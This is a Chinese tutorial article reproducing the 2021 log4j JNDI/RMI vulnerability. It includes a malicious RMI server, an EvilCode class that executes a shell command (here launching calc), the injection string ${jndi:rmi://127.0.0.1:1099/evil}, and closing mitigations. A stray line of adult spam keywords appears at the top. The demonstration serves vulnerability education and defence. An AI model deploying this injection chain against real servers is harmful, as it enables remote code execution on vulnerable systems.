" />

欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Java RMI引起的log4j漏洞問(wèn)題重現(xiàn)

 更新時(shí)間:2021年12月14日 11:31:04   作者:張占嶺?lind  
java的log4j框架出現(xiàn)了一個(gè)大漏洞對(duì)服務(wù)器案例引起了不小的影響,如果你使用的是spring框架,用的是logback,不受這個(gè)問(wèn)題的影響,下面跟著小編看下Java RMI引起的log4j漏洞問(wèn)題重現(xiàn),感興趣的朋友一起看看吧

2021-12-10日左右,java的log4j框架出現(xiàn)了一個(gè)大漏洞,對(duì)服務(wù)器案例引起了不小的影響,當(dāng)然只對(duì)于log4j的日志使用者來(lái)說(shuō),如果你是spring框架,用的是logback,不存在這個(gè)問(wèn)題。

RMI和JNDIRMI

  • (Remote Method Invocation) 即Java遠(yuǎn)程方法調(diào)用,一種用于實(shí)現(xiàn)遠(yuǎn)程過(guò)程調(diào)用的應(yīng)用程序編程接口
  • JNDI (Java Naming and Directory Interface)是一個(gè)應(yīng)用程序設(shè)計(jì)的API,為開(kāi)發(fā)人員提供了查找和訪(fǎng)問(wèn)各種命名和目錄服務(wù)的通用、統(tǒng)一的接口
  • JNDI和RMI的主要關(guān)系是RMI注冊(cè)的服務(wù)可以通過(guò)JNDIAPI訪(fǎng)問(wèn)。在討論到Spring反序列化漏洞之前,先看看如果通過(guò)JNDI來(lái)調(diào)用RMI注冊(cè)的服務(wù)。

模擬漏洞重現(xiàn)

pom依賴(lài)

    <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
            <exclusions>
                <exclusion>
                    <groupId>org.springframework.boot</groupId>
                    <artifactId>spring-boot-starter-logging</artifactId>
                </exclusion>
            </exclusions>
        </dependency>

        <!--log4j2核心包-->
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.0</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.0</version>
        </dependency>

黑客端

/**
 * 構(gòu)建RMI服務(wù)來(lái)響應(yīng)惡意代碼
 * <p>
 * Java RMI,即 遠(yuǎn)程方法調(diào)用(Remote Method Invocation),一種用于實(shí)現(xiàn)遠(yuǎn)程過(guò)程調(diào)用(RPC)的Java API, 能直接傳輸序列化后的Java對(duì)象和分布式垃圾收集。它的實(shí)現(xiàn)依賴(lài)于(JVM),因此它僅支持從一個(gè)JVM到另一個(gè)JVM的調(diào)用。
 */
public class RMIServer {
  @SneakyThrows
  public static void main(String... args) {
    try {
      // 本地主機(jī)上的遠(yuǎn)程對(duì)象注冊(cè)表Registry的實(shí)例,默認(rèn)端口1099
      LocateRegistry.createRegistry(1099);
      Registry registry = LocateRegistry.getRegistry();
      System.out.println("Create RMI registry on port 1099");
      //返回的Java對(duì)象
      Reference reference = new Reference("bug.EvilCode", "bug.EvilCode", null);
      ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
      // 把遠(yuǎn)程對(duì)象注冊(cè)到RMI注冊(cè)服務(wù)器上,并命名為evil
      registry.bind("evil", referenceWrapper);
    } catch (RemoteException | AlreadyBoundException | NamingException e) {
      e.printStackTrace();
    }
  }

/**
 * 執(zhí)行任意的腳本,目前的腳本會(huì)使windows服務(wù)器打開(kāi)計(jì)算器.
 */
public class EvilCode {
  static {
    System.out.println("受害服務(wù)器將執(zhí)行下面命令行");
    Process p;

    String[] cmd = {"calc"};
    try {
      p = Runtime.getRuntime().exec(cmd);
      InputStream fis = p.getInputStream();
      InputStreamReader isr = new InputStreamReader(fis);
      BufferedReader br = new BufferedReader(isr);
      String line = null;
      while ((line = br.readLine()) != null) {
        System.out.println(line);
      }
    } catch (IOException e) {
      e.printStackTrace();
    }
  }
}

網(wǎng)站端

public class Server {
  private static final Logger logger = LogManager.getLogger();

  public static void main(String[] args) {
    String name = "${java:runtime}";
    logger.info("name:{}", name);
    //模擬填寫(xiě)數(shù)據(jù),輸入構(gòu)造好的字符串,使受害服務(wù)器打印日志時(shí)執(zhí)行遠(yuǎn)程的代碼 同一臺(tái)可以使用127.0.0.1
    String username = "${jndi:rmi://127.0.0.1:1099/evil}";
    //正常打印業(yè)務(wù)日志
    logger.error("username:{}", username);

  }
}

【緊急補(bǔ)救措施3選1】

  • 修改 JVM 參數(shù) -Dlog4j2.formatMsgNoLookups=true
  • 修改配置 log4j2.formatMsgNoLookups=True
  • 將系統(tǒng)環(huán)境變量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 設(shè)置為 true

到此這篇關(guān)于java RMI引起的log4j漏洞的文章就介紹到這了,更多相關(guān)java RMI 漏洞內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • Java泛型的簡(jiǎn)單實(shí)例

    Java泛型的簡(jiǎn)單實(shí)例

    這篇文章介紹了Java泛型的簡(jiǎn)單實(shí)例,有需要的朋友可以參考一下
    2013-10-10
  • SpringBoot整合JPA框架實(shí)現(xiàn)過(guò)程講解

    SpringBoot整合JPA框架實(shí)現(xiàn)過(guò)程講解

    在開(kāi)發(fā)中,我們通常會(huì)對(duì)數(shù)據(jù)庫(kù)的數(shù)據(jù)進(jìn)行操作,Sprirng?Boot對(duì)關(guān)系型數(shù)據(jù)庫(kù)和非關(guān)系型數(shù)據(jù)庫(kù)的訪(fǎng)問(wèn)操作都提供了非常好的整合支持
    2022-12-12
  • Java中輸入輸出方式的簡(jiǎn)單示例

    Java中輸入輸出方式的簡(jiǎn)單示例

    Java語(yǔ)言的輸入輸出功能是十分強(qiáng)大而靈活的,美中不足的是看上去輸入輸出的代碼并不是很簡(jiǎn)潔,因?yàn)槟阃枰b許多不同的對(duì)象,下面這篇文章主要給大家介紹了關(guān)于Java中輸入輸出方式的相關(guān)資料,需要的朋友可以參考下
    2021-08-08
  • Java線(xiàn)程之間的共享與協(xié)作詳解

    Java線(xiàn)程之間的共享與協(xié)作詳解

    這篇文章主要介紹了Java線(xiàn)程之間的共享與協(xié)作詳解,進(jìn)程是操作系統(tǒng)進(jìn)行資源分配的最小單位,線(xiàn)程是進(jìn)程的一個(gè)實(shí)體,是CPU調(diào)度和分派的基本單位,它是比經(jīng)常更小的、能夠獨(dú)立運(yùn)行的基本單位
    2022-07-07
  • GSON實(shí)現(xiàn)Java對(duì)象的JSON序列化與反序列化的實(shí)例教程

    GSON實(shí)現(xiàn)Java對(duì)象的JSON序列化與反序列化的實(shí)例教程

    GSON是Google開(kāi)發(fā)并開(kāi)源的一個(gè)Java的JSON轉(zhuǎn)換庫(kù),這里我們將來(lái)講解GSON實(shí)現(xiàn)Java對(duì)象的JSON序列化與反序列化的實(shí)例教程,需要的朋友可以參考下
    2016-06-06
  • SpringBoot配置攔截器方式實(shí)例代碼

    SpringBoot配置攔截器方式實(shí)例代碼

    在本篇文章里小編給大家分享的是關(guān)于SpringBoot配置攔截器方式實(shí)例代碼,有需要的朋友們可以參考下。
    2020-04-04
  • 詳解JVM棧溢出和堆溢出

    詳解JVM棧溢出和堆溢出

    今天帶大家學(xué)習(xí)的是Java的相關(guān)知識(shí),文章圍繞著JVM棧溢出和堆溢出展開(kāi),文中有非常詳細(xì)的介紹及代碼示例,需要的朋友可以參考下
    2021-06-06
  • 深入了解Java對(duì)象的克隆

    深入了解Java對(duì)象的克隆

    這篇文章主要介紹了Java對(duì)象的克隆的相關(guān)資料,幫助大家更好的理解和學(xué)習(xí)Java,感興趣的朋友可以了解下
    2020-08-08
  • 詳解Java Spring AOP

    詳解Java Spring AOP

    這篇文章主要為大家介紹了Java Spring AOP,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下,希望能夠給你帶來(lái)幫助
    2022-01-01
  • springboot+thymeleaf打包成jar后找不到靜態(tài)資源的坑及解決

    springboot+thymeleaf打包成jar后找不到靜態(tài)資源的坑及解決

    這篇文章主要介紹了springboot+thymeleaf打包成jar后找不到靜態(tài)資源的坑及解決,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2021-11-11

最新評(píng)論